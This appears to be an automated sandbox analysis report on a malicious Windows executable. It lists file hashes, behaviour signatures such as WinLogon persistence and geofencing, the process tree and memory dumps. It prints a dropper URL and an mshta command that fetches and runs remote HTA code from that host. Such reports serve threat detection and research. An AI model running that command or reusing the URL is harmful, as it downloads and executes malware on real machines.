Analysis

  • max time kernel
    150s
  • max time network
    93s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-06-2024 13:38

General

  • Target

    16324fc81aea75ee1b90fbe20eb91c00_JaffaCakes118.exe

  • Size

    531KB

  • MD5

    16324fc81aea75ee1b90fbe20eb91c00

  • SHA1

    d6cf3bd8d5febb790e1ff8dd39b378229e73462f

  • SHA256

    0f948ceb06d973c6276ffc742b18c638dc301576997dbb20b5802df6cb35a8d3

  • SHA512

    d5974f326b4d61743ee3f64e7de79fa105e03ce640555aeae823d2270ec915b795b8308f9291ee718dbdf0213e0eec425b7b97159b0c9c5c0131dcb204d501a6

  • SSDEEP

    12288:A38uZK4UUIrqAMm+mgyIEiEPmU37ml5tiMWHfQTTwis:o1UqAMaIsPmULmFiZ

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://rerererererere.com/inst.php?id=crossales

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • UPX packed file 15 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\16324fc81aea75ee1b90fbe20eb91c00_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\16324fc81aea75ee1b90fbe20eb91c00_JaffaCakes118.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Checks computer location settings
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3620
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\System32\mshta.exe" http://rerererererere.com/inst.php?id=crossales
      2⤵
        PID:3660
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\dgfdgsdf.bat" "
        2⤵
          PID:3792

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\dgfdgsdf.bat

        Filesize

        263B

        MD5

        480ee02ae25c2fe07744b530f96069be

        SHA1

        0b81a2cbe7b3ce03de027114c5e0d7912dbdb068

        SHA256

        94eb9999990f3b653315b7fc17f904b5e47b416ac9cd60c28b3c79714c8e7f32

        SHA512

        e0bb50184d71c9cbf9cd2d01294e2548094d54da79d03f83d3afd7489b2c4f2b2849225602ab95e03e9665dc3887cdfbdc7339a611e587c2d2ca3844e1bbe47a

      • memory/3620-12-0x0000000000400000-0x00000000007F6000-memory.dmp

        Filesize

        4.0MB

      • memory/3620-9-0x0000000000400000-0x00000000007F6000-memory.dmp

        Filesize

        4.0MB

      • memory/3620-13-0x0000000000400000-0x00000000007F6000-memory.dmp

        Filesize

        4.0MB

      • memory/3620-8-0x0000000000400000-0x00000000007F6000-memory.dmp

        Filesize

        4.0MB

      • memory/3620-14-0x0000000000400000-0x00000000007F6000-memory.dmp

        Filesize

        4.0MB

      • memory/3620-10-0x0000000000BD0000-0x0000000000BD1000-memory.dmp

        Filesize

        4KB

      • memory/3620-11-0x0000000000400000-0x00000000007F6000-memory.dmp

        Filesize

        4.0MB

      • memory/3620-15-0x0000000000400000-0x00000000007F6000-memory.dmp

        Filesize

        4.0MB

      • memory/3620-7-0x0000000000400000-0x00000000007F6000-memory.dmp

        Filesize

        4.0MB

      • memory/3620-1-0x0000000000BD0000-0x0000000000BD1000-memory.dmp

        Filesize

        4KB

      • memory/3620-0-0x0000000000400000-0x00000000007F6000-memory.dmp

        Filesize

        4.0MB

      • memory/3620-16-0x0000000000400000-0x00000000007F6000-memory.dmp

        Filesize

        4.0MB

      • memory/3620-18-0x0000000000400000-0x00000000007F6000-memory.dmp

        Filesize

        4.0MB

      • memory/3620-19-0x0000000000400000-0x00000000007F6000-memory.dmp

        Filesize

        4.0MB

      • memory/3620-20-0x0000000000400000-0x00000000007F6000-memory.dmp

        Filesize

        4.0MB

      • memory/3620-21-0x0000000000400000-0x00000000007F6000-memory.dmp

        Filesize

        4.0MB

      • memory/3620-22-0x0000000000400000-0x00000000007F6000-memory.dmp

        Filesize

        4.0MB